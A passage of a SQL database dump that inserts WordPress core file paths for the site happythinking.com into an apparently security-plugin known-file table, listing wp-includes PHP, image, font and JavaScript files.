(4864, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-sidebar-block-editor-control.php', 'wp-includes/customize/class-wp-sidebar-block-editor-control.php'),
(4865, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-widget-area-customize-control.php', 'wp-includes/customize/class-wp-widget-area-customize-control.php'),
(4866, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-widget-form-customize-control.php', 'wp-includes/customize/class-wp-widget-form-customize-control.php'),
(4867, '/home/equipm11/public_html/happythinking.com/wp-includes/date.php', 'wp-includes/date.php'),
(4868, '/home/equipm11/public_html/happythinking.com/wp-includes/default-constants.php', 'wp-includes/default-constants.php'),
(4869, '/home/equipm11/public_html/happythinking.com/wp-includes/default-filters.php', 'wp-includes/default-filters.php'),
(4870, '/home/equipm11/public_html/happythinking.com/wp-includes/default-widgets.php', 'wp-includes/default-widgets.php'),
(4871, '/home/equipm11/public_html/happythinking.com/wp-includes/deprecated.php', 'wp-includes/deprecated.php'),
(4872, '/home/equipm11/public_html/happythinking.com/wp-includes/embed-template.php', 'wp-includes/embed-template.php'),
(4873, '/home/equipm11/public_html/happythinking.com/wp-includes/embed.php', 'wp-includes/embed.php'),
(4874, '/home/equipm11/public_html/happythinking.com/wp-includes/error-protection.php', 'wp-includes/error-protection.php'),
(4875, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-atom-comments.php', 'wp-includes/feed-atom-comments.php'),
(4876, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-atom.php', 'wp-includes/feed-atom.php'),
(4877, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rdf.php', 'wp-includes/feed-rdf.php'),
(4878, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss.php', 'wp-includes/feed-rss.php'),
(4879, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss2-comments.php', 'wp-includes/feed-rss2-comments.php'),
(4880, '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss2.php', 'wp-includes/feed-rss2.php'),
(4881, '/home/equipm11/public_html/happythinking.com/wp-includes/feed.php', 'wp-includes/feed.php'),
(4882, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-collection.php', 'wp-includes/fonts/class-wp-font-collection.php'),
(4883, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-face-resolver.php', 'wp-includes/fonts/class-wp-font-face-resolver.php'),
(4884, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-face.php', 'wp-includes/fonts/class-wp-font-face.php'),
(4885, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-library.php', 'wp-includes/fonts/class-wp-font-library.php'),
(4886, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-utils.php', 'wp-includes/fonts/class-wp-font-utils.php'),
(4887, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.eot', 'wp-includes/fonts/dashicons.eot'),
(4888, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.svg', 'wp-includes/fonts/dashicons.svg'),
(4889, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.ttf', 'wp-includes/fonts/dashicons.ttf'),
(4890, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.woff', 'wp-includes/fonts/dashicons.woff'),
(4891, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.woff2', 'wp-includes/fonts/dashicons.woff2'),
(4892, '/home/equipm11/public_html/happythinking.com/wp-includes/fonts.php', 'wp-includes/fonts.php'),
(4893, '/home/equipm11/public_html/happythinking.com/wp-includes/formatting.php', 'wp-includes/formatting.php'),
(4894, '/home/equipm11/public_html/happythinking.com/wp-includes/functions.php', 'wp-includes/functions.php'),
(4895, '/home/equipm11/public_html/happythinking.com/wp-includes/functions.wp-scripts.php', 'wp-includes/functions.wp-scripts.php'),
(4896, '/home/equipm11/public_html/happythinking.com/wp-includes/functions.wp-styles.php', 'wp-includes/functions.wp-styles.php'),
(4897, '/home/equipm11/public_html/happythinking.com/wp-includes/general-template.php', 'wp-includes/general-template.php'),
(4898, '/home/equipm11/public_html/happythinking.com/wp-includes/global-styles-and-settings.php', 'wp-includes/global-styles-and-settings.php'),
(4899, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-active-formatting-elements.php', 'wp-includes/html-api/class-wp-html-active-formatting-elements.php'),
(4900, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-attribute-token.php', 'wp-includes/html-api/class-wp-html-attribute-token.php'),
(4901, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-open-elements.php', 'wp-includes/html-api/class-wp-html-open-elements.php'),
(4902, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-processor-state.php', 'wp-includes/html-api/class-wp-html-processor-state.php'),
(4903, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-processor.php', 'wp-includes/html-api/class-wp-html-processor.php'),
(4904, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-span.php', 'wp-includes/html-api/class-wp-html-span.php'),
(4905, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-tag-processor.php', 'wp-includes/html-api/class-wp-html-tag-processor.php'),
(4906, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-text-replacement.php', 'wp-includes/html-api/class-wp-html-text-replacement.php'),
(4907, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-token.php', 'wp-includes/html-api/class-wp-html-token.php'),
(4908, '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-unsupported-exception.php', 'wp-includes/html-api/class-wp-html-unsupported-exception.php'),
(4909, '/home/equipm11/public_html/happythinking.com/wp-includes/http.php', 'wp-includes/http.php'),
(4910, '/home/equipm11/public_html/happythinking.com/wp-includes/https-detection.php', 'wp-includes/https-detection.php'),
(4911, '/home/equipm11/public_html/happythinking.com/wp-includes/https-migration.php', 'wp-includes/https-migration.php'),
(4912, '/home/equipm11/public_html/happythinking.com/wp-includes/images/admin-bar-sprite-2x.png', 'wp-includes/images/admin-bar-sprite-2x.png'),
(4913, '/home/equipm11/public_html/happythinking.com/wp-includes/images/admin-bar-sprite.png', 'wp-includes/images/admin-bar-sprite.png'),
(4914, '/home/equipm11/public_html/happythinking.com/wp-includes/images/arrow-pointer-blue-2x.png', 'wp-includes/images/arrow-pointer-blue-2x.png'),
(4915, '/home/equipm11/public_html/happythinking.com/wp-includes/images/arrow-pointer-blue.png', 'wp-includes/images/arrow-pointer-blue.png'),
(4916, '/home/equipm11/public_html/happythinking.com/wp-includes/images/blank.gif', 'wp-includes/images/blank.gif'),
(4917, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/archive.png', 'wp-includes/images/crystal/archive.png'),
(4918, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/audio.png', 'wp-includes/images/crystal/audio.png'),
(4919, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/code.png', 'wp-includes/images/crystal/code.png'),
(4920, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/default.png', 'wp-includes/images/crystal/default.png'),
(4921, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/document.png', 'wp-includes/images/crystal/document.png'),
(4922, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/interactive.png', 'wp-includes/images/crystal/interactive.png'),
(4923, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/license.txt', 'wp-includes/images/crystal/license.txt'),
(4924, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/spreadsheet.png', 'wp-includes/images/crystal/spreadsheet.png'),
(4925, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/text.png', 'wp-includes/images/crystal/text.png'),
(4926, '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/video.png', 'wp-includes/images/crystal/video.png'),
(4927, '/home/equipm11/public_html/happythinking.com/wp-includes/images/down_arrow-2x.gif', 'wp-includes/images/down_arrow-2x.gif'),
(4928, '/home/equipm11/public_html/happythinking.com/wp-includes/images/down_arrow.gif', 'wp-includes/images/down_arrow.gif'),
(4929, '/home/equipm11/public_html/happythinking.com/wp-includes/images/icon-pointer-flag-2x.png', 'wp-includes/images/icon-pointer-flag-2x.png'),
(4930, '/home/equipm11/public_html/happythinking.com/wp-includes/images/icon-pointer-flag.png', 'wp-includes/images/icon-pointer-flag.png'),
(4931, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/archive.png', 'wp-includes/images/media/archive.png'),
(4932, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/archive.svg', 'wp-includes/images/media/archive.svg'),
(4933, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/audio.png', 'wp-includes/images/media/audio.png'),
(4934, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/audio.svg', 'wp-includes/images/media/audio.svg'),
(4935, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/code.png', 'wp-includes/images/media/code.png'),
(4936, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/code.svg', 'wp-includes/images/media/code.svg'),
(4937, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/default.png', 'wp-includes/images/media/default.png'),
(4938, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/default.svg', 'wp-includes/images/media/default.svg'),
(4939, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/document.png', 'wp-includes/images/media/document.png'),
(4940, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/document.svg', 'wp-includes/images/media/document.svg'),
(4941, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/interactive.png', 'wp-includes/images/media/interactive.png'),
(4942, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/interactive.svg', 'wp-includes/images/media/interactive.svg'),
(4943, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/spreadsheet.png', 'wp-includes/images/media/spreadsheet.png'),
(4944, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/spreadsheet.svg', 'wp-includes/images/media/spreadsheet.svg'),
(4945, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/text.png', 'wp-includes/images/media/text.png'),
(4946, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/text.svg', 'wp-includes/images/media/text.svg'),
(4947, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/video.png', 'wp-includes/images/media/video.png'),
(4948, '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/video.svg', 'wp-includes/images/media/video.svg'),
(4949, '/home/equipm11/public_html/happythinking.com/wp-includes/images/rss-2x.png', 'wp-includes/images/rss-2x.png'),
(4950, '/home/equipm11/public_html/happythinking.com/wp-includes/images/rss.png', 'wp-includes/images/rss.png'),
(4951, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/frownie.png', 'wp-includes/images/smilies/frownie.png'),
(4952, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_arrow.gif', 'wp-includes/images/smilies/icon_arrow.gif'),
(4953, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_biggrin.gif', 'wp-includes/images/smilies/icon_biggrin.gif'),
(4954, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_confused.gif', 'wp-includes/images/smilies/icon_confused.gif'),
(4955, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_cool.gif', 'wp-includes/images/smilies/icon_cool.gif'),
(4956, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_cry.gif', 'wp-includes/images/smilies/icon_cry.gif'),
(4957, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_eek.gif', 'wp-includes/images/smilies/icon_eek.gif'),
(4958, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_evil.gif', 'wp-includes/images/smilies/icon_evil.gif'),
(4959, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_exclaim.gif', 'wp-includes/images/smilies/icon_exclaim.gif'),
(4960, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_idea.gif', 'wp-includes/images/smilies/icon_idea.gif'),
(4961, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_lol.gif', 'wp-includes/images/smilies/icon_lol.gif'),
(4962, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_mad.gif', 'wp-includes/images/smilies/icon_mad.gif'),
(4963, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_mrgreen.gif', 'wp-includes/images/smilies/icon_mrgreen.gif'),
(4964, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_neutral.gif', 'wp-includes/images/smilies/icon_neutral.gif'),
(4965, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_question.gif', 'wp-includes/images/smilies/icon_question.gif'),
(4966, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_razz.gif', 'wp-includes/images/smilies/icon_razz.gif'),
(4967, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_redface.gif', 'wp-includes/images/smilies/icon_redface.gif'),
(4968, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_rolleyes.gif', 'wp-includes/images/smilies/icon_rolleyes.gif'),
(4969, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_sad.gif', 'wp-includes/images/smilies/icon_sad.gif'),
(4970, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_smile.gif', 'wp-includes/images/smilies/icon_smile.gif'),
(4971, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_surprised.gif', 'wp-includes/images/smilies/icon_surprised.gif'),
(4972, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_twisted.gif', 'wp-includes/images/smilies/icon_twisted.gif'),
(4973, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/icon_wink.gif', 'wp-includes/images/smilies/icon_wink.gif'),
(4974, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/mrgreen.png', 'wp-includes/images/smilies/mrgreen.png'),
(4975, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/rolleyes.png', 'wp-includes/images/smilies/rolleyes.png'),
(4976, '/home/equipm11/public_html/happythinking.com/wp-includes/images/smilies/simple-smile.png', 'wp-includes/images/smilies/simple-smile.png'),
(4977, '/home/equipm11/public_html/happythinking.com/wp-includes/images/spinner-2x.gif', 'wp-includes/images/spinner-2x.gif'),
(4978, '/home/equipm11/public_html/happythinking.com/wp-includes/images/spinner.gif', 'wp-includes/images/spinner.gif'),
(4979, '/home/equipm11/public_html/happythinking.com/wp-includes/images/toggle-arrow-2x.png', 'wp-includes/images/toggle-arrow-2x.png');
INSERT INTO `wpou_wfknownfilelist` VALUES
(4980, '/home/equipm11/public_html/happythinking.com/wp-includes/images/toggle-arrow.png', 'wp-includes/images/toggle-arrow.png'),
(4981, '/home/equipm11/public_html/happythinking.com/wp-includes/images/uploader-icons-2x.png', 'wp-includes/images/uploader-icons-2x.png'),
(4982, '/home/equipm11/public_html/happythinking.com/wp-includes/images/uploader-icons.png', 'wp-includes/images/uploader-icons.png'),
(4983, '/home/equipm11/public_html/happythinking.com/wp-includes/images/w-logo-blue-white-bg.png', 'wp-includes/images/w-logo-blue-white-bg.png'),
(4984, '/home/equipm11/public_html/happythinking.com/wp-includes/images/w-logo-blue.png', 'wp-includes/images/w-logo-blue.png'),
(4985, '/home/equipm11/public_html/happythinking.com/wp-includes/images/wpicons-2x.png', 'wp-includes/images/wpicons-2x.png'),
(4986, '/home/equipm11/public_html/happythinking.com/wp-includes/images/wpicons.png', 'wp-includes/images/wpicons.png'),
(4987, '/home/equipm11/public_html/happythinking.com/wp-includes/images/wpspin-2x.gif', 'wp-includes/images/wpspin-2x.gif'),
(4988, '/home/equipm11/public_html/happythinking.com/wp-includes/images/wpspin.gif', 'wp-includes/images/wpspin.gif'),
(4989, '/home/equipm11/public_html/happythinking.com/wp-includes/images/xit-2x.gif', 'wp-includes/images/xit-2x.gif'),
(4990, '/home/equipm11/public_html/happythinking.com/wp-includes/images/xit.gif', 'wp-includes/images/xit.gif'),
(4991, '/home/equipm11/public_html/happythinking.com/wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor.php', 'wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor.php'),
(4992, '/home/equipm11/public_html/happythinking.com/wp-includes/interactivity-api/class-wp-interactivity-api.php', 'wp-includes/interactivity-api/class-wp-interactivity-api.php'),
(4993, '/home/equipm11/public_html/happythinking.com/wp-includes/interactivity-api/interactivity-api.php', 'wp-includes/interactivity-api/interactivity-api.php'),
(4994, '/home/equipm11/public_html/happythinking.com/wp-includes/js/admin-bar.js', 'wp-includes/js/admin-bar.js'),
(4995, '/home/equipm11/public_html/happythinking.com/wp-includes/js/admin-bar.min.js', 'wp-includes/js/admin-bar.min.js'),
(4996, '/home/equipm11/public_html/happythinking.com/wp-includes/js/api-request.js', 'wp-includes/js/api-request.js'),
(4997, '/home/equipm11/public_html/happythinking.com/wp-includes/js/api-request.min.js', 'wp-includes/js/api-request.min.js'),
(4998, '/home/equipm11/public_html/happythinking.com/wp-includes/js/autosave.js', 'wp-includes/js/autosave.js'),
(4999, '/home/equipm11/public_html/happythinking.com/wp-includes/js/autosave.min.js', 'wp-includes/js/autosave.min.js'),
(5000, '/home/equipm11/public_html/happythinking.com/wp-includes/js/backbone.js', 'wp-includes/js/backbone.js'),
(5001, '/home/equipm11/public_html/happythinking.com/wp-includes/js/backbone.min.js', 'wp-includes/js/backbone.min.js'),
(5002, '/home/equipm11/public_html/happythinking.com/wp-includes/js/clipboard.js', 'wp-includes/js/clipboard.js'),
(5003, '/home/equipm11/public_html/happythinking.com/wp-includes/js/clipboard.min.js', 'wp-includes/js/clipboard.min.js'),
(5004, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/codemirror.min.css', 'wp-includes/js/codemirror/codemirror.min.css'),
(5005, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/codemirror.min.js', 'wp-includes/js/codemirror/codemirror.min.js'),
(5006, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/csslint.js', 'wp-includes/js/codemirror/csslint.js'),
(5007, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/esprima.js', 'wp-includes/js/codemirror/esprima.js'),
(5008, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/fakejshint.js', 'wp-includes/js/codemirror/fakejshint.js'),
(5009, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/htmlhint-kses.js', 'wp-includes/js/codemirror/htmlhint-kses.js'),
(5010, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/htmlhint.js', 'wp-includes/js/codemirror/htmlhint.js'),
(5011, '/home/equipm11/public_html/happythinking.com/wp-includes/js/codemirror/jsonlint.js', 'wp-includes/js/codemirror/jsonlint.js'),
(5012, '/home/equipm11/public_html/happythinking.com/wp-includes/js/colorpicker.js', 'wp-includes/js/colorpicker.js'),
(5013, '/home/equipm11/public_html/happythinking.com/wp-includes/js/colorpicker.min.js', 'wp-includes/js/colorpicker.min.js'),
(5014, '/home/equipm11/public_html/happythinking.com/wp-includes/js/comment-reply.js', 'wp-includes/js/comment-reply.js'),
(5015, '/home/equipm11/public_html/happythinking.com/wp-includes/js/comment-reply.min.js', 'wp-includes/js/comment-reply.min.js'),
(5016, '/home/equipm11/public_html/happythinking.com/wp-includes/js/crop/cropper.css', 'wp-includes/js/crop/cropper.css'),
(5017, '/home/equipm11/public_html/happythinking.com/wp-includes/js/crop/cropper.js', 'wp-includes/js/crop/cropper.js'),
(5018, '/home/equipm11/public_html/happythinking.com/wp-includes/js/crop/marqueeHoriz.gif', 'wp-includes/js/crop/marqueeHoriz.gif'),
(5019, '/home/equipm11/public_html/happythinking.com/wp-includes/js/crop/marqueeVert.gif', 'wp-includes/js/crop/marqueeVert.gif'),
(5020, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-base.js', 'wp-includes/js/customize-base.js'),
(5021, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-base.min.js', 'wp-includes/js/customize-base.min.js'),
(5022, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-loader.js', 'wp-includes/js/customize-loader.js'),
(5023, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-loader.min.js', 'wp-includes/js/customize-loader.min.js'),
(5024, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-models.js', 'wp-includes/js/customize-models.js'),
(5025, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-models.min.js', 'wp-includes/js/customize-models.min.js'),
(5026, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview-nav-menus.js', 'wp-includes/js/customize-preview-nav-menus.js'),
(5027, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview-nav-menus.min.js', 'wp-includes/js/customize-preview-nav-menus.min.js'),
(5028, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview-widgets.js', 'wp-includes/js/customize-preview-widgets.js'),
(5029, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview-widgets.min.js', 'wp-includes/js/customize-preview-widgets.min.js'),
(5030, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview.js', 'wp-includes/js/customize-preview.js'),
(5031, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-preview.min.js', 'wp-includes/js/customize-preview.min.js'),
(5032, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-selective-refresh.js', 'wp-includes/js/customize-selective-refresh.js'),
(5033, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-selective-refresh.min.js', 'wp-includes/js/customize-selective-refresh.min.js'),
(5034, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-views.js', 'wp-includes/js/customize-views.js'),
(5035, '/home/equipm11/public_html/happythinking.com/wp-includes/js/customize-views.min.js', 'wp-includes/js/customize-views.min.js'),
(5036, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/a11y.js', 'wp-includes/js/dist/a11y.js'),
(5037, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/a11y.min.js', 'wp-includes/js/dist/a11y.min.js'),
(5038, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/annotations.js', 'wp-includes/js/dist/annotations.js'),
(5039, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/annotations.min.js', 'wp-includes/js/dist/annotations.min.js'),
(5040, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/api-fetch.js', 'wp-includes/js/dist/api-fetch.js'),
(5041, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/api-fetch.min.js', 'wp-includes/js/dist/api-fetch.min.js'),
(5042, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/autop.js', 'wp-includes/js/dist/autop.js'),
(5043, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/autop.min.js', 'wp-includes/js/dist/autop.min.js'),
(5044, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/blob.js', 'wp-includes/js/dist/blob.js'),
(5045, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/blob.min.js', 'wp-includes/js/dist/blob.min.js'),
(5046, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-directory.js', 'wp-includes/js/dist/block-directory.js'),
(5047, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-directory.min.js', 'wp-includes/js/dist/block-directory.min.js'),
(5048, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-editor.js', 'wp-includes/js/dist/block-editor.js'),
(5049, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-editor.min.js', 'wp-includes/js/dist/block-editor.min.js'),
(5050, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-library.js', 'wp-includes/js/dist/block-library.js'),
(5051, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-library.min.js', 'wp-includes/js/dist/block-library.min.js'),
(5052, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-serialization-default-parser.js', 'wp-includes/js/dist/block-serialization-default-parser.js'),
(5053, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/block-serialization-default-parser.min.js', 'wp-includes/js/dist/block-serialization-default-parser.min.js'),
(5054, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/blocks.js', 'wp-includes/js/dist/blocks.js'),
(5055, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/blocks.min.js', 'wp-includes/js/dist/blocks.min.js'),
(5056, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/commands.js', 'wp-includes/js/dist/commands.js'),
(5057, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/commands.min.js', 'wp-includes/js/dist/commands.min.js'),
(5058, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/components.js', 'wp-includes/js/dist/components.js'),
(5059, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/components.min.js', 'wp-includes/js/dist/components.min.js'),
(5060, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/compose.js', 'wp-includes/js/dist/compose.js'),
(5061, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/compose.min.js', 'wp-includes/js/dist/compose.min.js'),
(5062, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/core-commands.js', 'wp-includes/js/dist/core-commands.js'),
(5063, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/core-commands.min.js', 'wp-includes/js/dist/core-commands.min.js'),
(5064, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/core-data.js', 'wp-includes/js/dist/core-data.js'),
(5065, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/core-data.min.js', 'wp-includes/js/dist/core-data.min.js'),
(5066, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/customize-widgets.js', 'wp-includes/js/dist/customize-widgets.js'),
(5067, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/customize-widgets.min.js', 'wp-includes/js/dist/customize-widgets.min.js'),
(5068, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/data-controls.js', 'wp-includes/js/dist/data-controls.js'),
(5069, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/data-controls.min.js', 'wp-includes/js/dist/data-controls.min.js'),
(5070, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/data.js', 'wp-includes/js/dist/data.js'),
(5071, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/data.min.js', 'wp-includes/js/dist/data.min.js'),
(5072, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/date.js', 'wp-includes/js/dist/date.js'),
(5073, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/date.min.js', 'wp-includes/js/dist/date.min.js'),
(5074, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/deprecated.js', 'wp-includes/js/dist/deprecated.js'),
(5075, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/deprecated.min.js', 'wp-includes/js/dist/deprecated.min.js'),
(5076, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/development/react-refresh-entry.js', 'wp-includes/js/dist/development/react-refresh-entry.js'),
(5077, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/development/react-refresh-entry.min.js', 'wp-includes/js/dist/development/react-refresh-entry.min.js'),
(5078, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/development/react-refresh-runtime.js', 'wp-includes/js/dist/development/react-refresh-runtime.js'),
(5079, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/development/react-refresh-runtime.min.js', 'wp-includes/js/dist/development/react-refresh-runtime.min.js'),
(5080, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/dom-ready.js', 'wp-includes/js/dist/dom-ready.js'),
(5081, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/dom-ready.min.js', 'wp-includes/js/dist/dom-ready.min.js'),
(5082, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/dom.js', 'wp-includes/js/dist/dom.js'),
(5083, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/dom.min.js', 'wp-includes/js/dist/dom.min.js'),
(5084, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-post.js', 'wp-includes/js/dist/edit-post.js'),
(5085, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-post.min.js', 'wp-includes/js/dist/edit-post.min.js'),
(5086, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-site.js', 'wp-includes/js/dist/edit-site.js'),
(5087, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-site.min.js', 'wp-includes/js/dist/edit-site.min.js'),
(5088, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-widgets.js', 'wp-includes/js/dist/edit-widgets.js'),
(5089, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/edit-widgets.min.js', 'wp-includes/js/dist/edit-widgets.min.js'),
(5090, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/editor.js', 'wp-includes/js/dist/editor.js'),
(5091, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/editor.min.js', 'wp-includes/js/dist/editor.min.js'),
(5092, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/element.js', 'wp-includes/js/dist/element.js'),
